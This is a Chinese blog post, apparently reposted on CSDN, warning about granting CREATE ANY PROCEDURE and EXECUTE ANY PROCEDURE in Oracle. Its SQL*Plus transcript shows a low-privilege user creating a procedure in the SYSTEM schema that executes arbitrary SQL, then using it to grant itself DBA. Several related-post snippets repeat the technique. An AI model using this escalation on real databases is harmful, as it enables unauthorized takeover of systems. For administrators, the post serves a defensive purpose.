给一个用户授予CREATE ANY PROCEDURE和EXECUTE ANY PROCEDURE带来的后果

最新推荐文章于 2024-04-19 16:47:34 发布
最新推荐文章于 2024-04-19 16:47:34 发布
阅读量2.9k 收藏
点赞数
分类专栏: Oracle

原文地址:http://blog.itpub.net/16162908/viewspace-594904/


给一个用户授予CREATE ANY PROCEDURE和EXECUTE ANY PROCEDURE带来的后果。
创建一个新用户,并且给这个用户授予CREATE SESSION的权限,使其能连接到会话。
SQL> CONN / AS SYSDBA
Connected.
SQL> CREATE USER JACKY IDENTIFIED BY JACKY;
User created.
SQL> GRANT CREATE SESSION TO JACKY;
Grant succeeded.
以JACKY用户登陆到数据库
SQL> CONN JACKY/JACKY
Connected.
SQL> SELECT * FROM SESSION_ROLES;
no rows selected
SQL> SELECT * FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
可以看到JACKY 用户只有CREATE SESSION的权限。
现在授予JACKY用户 CREATE ANY PROCEDURE和EXECUTE ANY PROCEDURE的权限。

SQL> GRANT EXECUTE ANY PROCEDURE TO JACKY;
Grant succeeded.
SQL> GRANT CREATE ANY PROCEDURE TO JACKY;
Grant succeeded.
切换到JACKY用户所在的会话,执行下面的查询:
SQL> SELECT * FROM SESSION_ROLES;
no rows selected
SQL> SELECT * FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
可以看到JACKY用户具有下面的权限了。
在JACKY用户下创建下面的存储过程:

SQL> SHOW USER
USER is "JACKY"
SQL> CREATE OR REPLACE PROCEDURE SYSTEM.GRANT_PRIVS(P_TEXT VARCHAR2)
2 IS
3 BEGIN
4 EXECUTE IMMEDIATE P_TEXT;
5 END;
6 /
Procedure created.
执行下面的存储过程:
SQL> EXECUTE SYSTEM.GRANT_PRIVS('GRANT DBA TO JACKY');
PL/SQL procedure successfully completed.
以JACKY用户重新登陆一下数据库

SQL> CONN JACKY/JACKY;
Connected.
SQL> SELECT * FROM SESSION_ROLES;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
JAVA_ADMIN
ROLE
------------------------------
JAVA_DEPLOY
XDBADMIN
XDBWEBSERVICES
OLAP_DBA
15 rows selected
SQL> SELECT COUNT(*) FROM SESSION_PRIVS;
COUNT(*)
----------
161
可以看到JACKY用户给自己加了很多权限。

kepa520
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
oracle 赋予其他用户最高权限_Oracle授予用户权限
weixin_36324695的博客
02-08 5124
Oracle授予用户权限需要在Oracle里创建一个用户名和密码均为SYSDATA的用户,找了找资料,创建成功,现将Oracle中用户的创建和授予命令:1、Linux 下Oracle的启动以Oracle身份登录启动lsnrctl start登录sqplus /nolog连接数据库connect/assysdba启动数据库startup关闭数据库shutdown immediate2、在数据中创建用...
Oracle的对象权限、角色权限、系统权限
coco3600的博客
06-15 1176
Oracle的对象权限、角色权限、系统权限 一、用户与模式 用户:对数据库的访问,需要以适当用户身份通过验证,并具有相关权限来完成一系列动作 ...
create any procedureexecute any procedure不该同时授权给普通用户
cky0597的博客
06-21 407
如果管理员把create any procedureexecute any procedure系统权限授权给一个普通用户,普通用户可以通过一个过程把DBA角色非法授权给自己,演示如下: SQL> create u...
数据库系统权限
鲨鱼胃的博客
10-30 984
alter any cluster 修改任意簇的权限   alter any index 修改任意索引的权限   alter any role 修改任意角色的权限   alter any sequence 修改任意序列的权限   alter any snapshot 修改任意快照的权限   alter any table 修改任意表的权限   alter any trigger 修改任意触发器的权限   alter cluster 修改拥有簇的权限   alter database 修改数据库的权限   a
Oracle权限管理
最新发布
m0_72327175的博客
04-19 1691
Oracle权限允许用户访问属于其它用户的对象或执行程序,Oracle系统提供三种权限:Object 对象级、System 系统级、Role 角色级。这些权限可以授予用户、特殊用户public或角色,如果授予一个权限给特殊用户"Public"(用户public是oracle预定义的,每个用户享有这个用户享有的权限),那么就意味作将该权限授予了该数据库的所有用户。(1)系统权限:是指在系统级控制数据库的存取和使用的机制,即执行某种SQL语句的能力。
赋予oracle执行存储过程权限
cuiyan1982的专栏
05-15 5076
grant create any table to username; grant create any procedure to username ; grant execute any procedure to username ;
记录使用Oracle数据库时常用的指令,包括数据泵导入导出指令
duochirou的博客
08-24 626
一、oracle创建表空间、用户、目录和授权 1.假如现在已经建好名为'oracledb'的数据库 此时在D:\app\Admin\oradata目录下已经存在oracledb目录(注意:我的Oracle11g安装在D盘下,若你的Oracle安装在别的目录,那么你新建的数据库目录就在*:app\Administrator\oradata目录下)。 2.创建用户之前要创建"临时表空间",若不创建则默认的临时表空间为temp。 SQL> create tablespace ZHBG_test d.
Oracle DBMS_SCHEDULER
clare0807的博客
07-16 172
转载[@more@]Oracle DBMS_SCHEDULERVersion 10.2 General InformationSource{ORACLE_HOME}/rdbms/admin/dbmssch.sqlFirst Av...
Oracle给用户授权truncatetable的实现方案
09-09
首先,我们来看一种较粗鲁且不安全的方法,即授予用户`DROP ANY TABLE`权限。这是因为`TRUNCATE`操作在Oracle中属于`DROP`语句的一部分。执行以下命令可为用户`DWETL`授予此权限: ```sql GRANT DROP ANY TABLE TO ...
如何实现只授予用户查看存储过程定义的权限
09-10
1. 将存储过程封装在一个包(PACKAGE)中,只授予用户执行包的接口(即包的公共过程或函数),而不授予DEBUG权限。这样,用户无法直接查看包体内的私有过程或变量定义。 2. 如果需要更细粒度的控制,可以创建一个...
Oracle数据库创建用户与数据库备份小结(必看篇)
09-09
- `EXECUTE ANY PROCEDURE`允许用户执行任何存储过程。 - `UNLIMITED TABLESPACE`允许用户使用无限的表空间配额。 - `CONNECT`角色允许用户连接到数据库。 - `RESOURCE`角色允许用户创建数据库对象,但不能创建...
一个statspack例子
05-15
GRANT CREATE SESSION, EXECUTE ANY PROCEDURE TO statspack; ``` 然后,我们使用DBMS_STATS包中的GATHER_DATABASE_STATISTICS过程来启动Statspack收集性能数据。例如,以下命令将创建一个初始快照: ```sql EXEC ...
Oracle权限表汇编.docx
05-02
12. **CREATE ROLE/ALTER ANY ROLE/DROP ANY ROLE/GRANT ANY ROLE**: 角色是权限的集合,可以分配给多个用户,便于权限管理。 13. **CREATE ROLLBACK SEGMENT/ALTER ROLLBACK SEGMENT/DROP ROLLBACK SEGMENT**: ...
Oracle授权语句
u013146766的博客
09-26 2729
授权存储过程:--授权任意的存储过程 grant execute any procedure to user_name; --授权创建存储过程 grant create any procedure to username; --指定存储过程 grant execute ON procedure_name to user_name;
Oracle基础——第四章 用户管理及表空间
DBA@Robin
04-01 3641
本章目标   数据库用户管理 数据库权限管理 数据库存储结构   数据库用户管理   1.        创建用户 a)        语法   可以使用CREATE USER语句创建用户 语法如下 CREATE USER user_name IDENTIFIED BY password [DEFAULT TABLESPACE default_tablespace]
第十章 SQL命令 CREATE PROCEDURE(一)
yaoxin521123的博客
09-09 7714
文章目录 第十章 SQL命令 CREATE PROCEDURE(一)大纲参数描述参数procnameparameter_list 第十章 SQL命令 CREATE PROCEDURE(一) 创建作为SQL存储过程公开的方法或查询。 大纲 CREATE PROCEDURE procname(parameter_list) [ characteristics ] [ LANGUAGE SQL ] BEGIN code_body ; END CREATE PROCEDURE procn
提权create/execute any procedure
weixin_34176694的博客
09-15 136
如果用户eygle 有角色 create any procedureexecute any procedure用户 eygle 创建并执行如下存储过程则,可以自己提权到dba角色。create or replace procedure system.do(p_text varchar2)isbeginexecute immediate p_text;end;...
Oracle-PROCEDURE权限解读
热门推荐
小工匠
11-22 1万+
问题存过中有查询dba_相关的数据字典视图,编译时却提示 ‘表或视图不存在’,编译不通过。但是报错的语句在SQL中确实可以查到的,说明问题并不是提出给出的’表或视图不存在’导致的。这里需要注意SQL权限和存过的权限是不同的。我们查询的是sys用户下的数据字典,需要显示授权 虽然cc用户也是DBA用户。 select * from dba_role_privs where grantee='CC';
CREATE USER cedar IDENTIFIED BY cedar DEFAULT TABLESPACE CEDAR_DATA TEMPORARY TABLESPACE TEMP PROFILE DEFAULT ACCOUNT UNLOCK; -- 5 Roles for cedar GRANT DBA TO cedar; GRANT RESOURCE TO cedar WITH ADMIN OPTION; GRANT AQ_ADMINISTRATOR_ROLE TO cedar; GRANT CONNECT TO cedar WITH ADMIN OPTION; GRANT AQ_USER_ROLE TO cedar; ALTER USER cedar DEFAULT ROLE ALL; -- 44 System Privileges for cedar GRANT CREATE ANY DIRECTORY TO cedar WITH ADMIN OPTION; GRANT CREATE PUBLIC SYNONYM TO cedar WITH ADMIN OPTION; GRANT EXECUTE ANY CLASS TO cedar WITH ADMIN OPTION; GRANT DROP ANY VIEW TO cedar WITH ADMIN OPTION; GRANT CREATE CLUSTER TO cedar; GRANT ALTER SYSTEM TO cedar; GRANT UPDATE ANY TABLE TO cedar; GRANT INSERT ANY TABLE TO cedar; GRANT LOCK ANY TABLE TO cedar; GRANT CREATE EXTERNAL JOB TO cedar WITH ADMIN OPTION; GRANT EXECUTE ANY PROGRAM TO cedar WITH ADMIN OPTION; GRANT CREATE JOB TO cedar WITH ADMIN OPTION; GRANT DROP ANY DIRECTORY TO cedar WITH ADMIN OPTION; GRANT ALTER ANY TRIGGER TO cedar; GRANT CREATE DATABASE LINK TO cedar; GRANT DROP ANY TABLE TO cedar WITH ADMIN OPTION; GRANT CREATE TABLE TO cedar WITH ADMIN OPTION; GRANT QUERY REWRITE TO cedar; GRANT ANALYZE ANY TO cedar; GRANT DROP ANY TRIGGER TO cedar; GRANT EXECUTE ANY PROCEDURE TO cedar; GRANT SELECT ANY TABLE TO cedar WITH ADMIN OPTION; GRANT ALTER ANY TABLE TO cedar; GRANT UNLIMITED TABLESPACE TO cedar WITH ADMIN OPTION; GRANT CREATE SESSION TO cedar; GRANT CREATE ANY TRIGGER TO cedar; GRANT DROP ANY PROCEDURE TO cedar WITH ADMIN OPTION; GRANT ALTER ANY PROCEDURE TO cedar; GRANT DROP PUBLIC SYNONYM TO cedar WITH ADMIN OPTION; GRANT DROP ANY SYNONYM TO cedar WITH ADMIN OPTION; GRANT MANAGE SCHEDULER TO cedar WITH ADMIN OPTION; GRANT CREATE ANY PROCEDURE TO cedar; GRANT CREATE PROCEDURE TO cedar WITH ADMIN OPTION; GRANT CREATE SEQUENCE TO cedar; GRANT CREATE VIEW TO cedar WITH ADMIN OPTION; GRANT CREATE SYNONYM TO cedar; GRANT DROP ANY INDEX TO cedar; GRANT DELETE ANY TABLE TO cedar; GRANT CREATE ANY TABLE TO cedar; GRANT CREATE ANY JOB TO cedar WITH ADMIN OPTION; GRANT SELECT ANY DICTIONARY TO cedar WITH ADMIN OPTION; GRANT CREATE ROLE TO cedar; GRANT CREATE ANY SYNONYM TO cedar WITH ADMIN OPTION; GRANT ALTER SESSION TO cedar WITH ADMIN OPTION; GRANT EXECUTE ON sys.dbms_aq TO cedar; GRANT EXECUTE ON sys.dbms_aqadm TO cedar; GRANT EXECUTE ON sys.dbms_network_acl_admin TO cedar; GRANT ALL ON sys.DBMS_LOCK TO cedar; 这个SQL在oracle 能用吗
06-08
其中,该用户授予了 DBA、RESOURCE、AQ_ADMINISTRATOR_ROLE、CONNECT、AQ_USER_ROLE 等角色,也被授予了 44 个系统权限(如 CREATE ANY DIRECTORY、EXECUTE ANY CLASS、CREATE TABLE 等)。此外,该用户还被授予了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值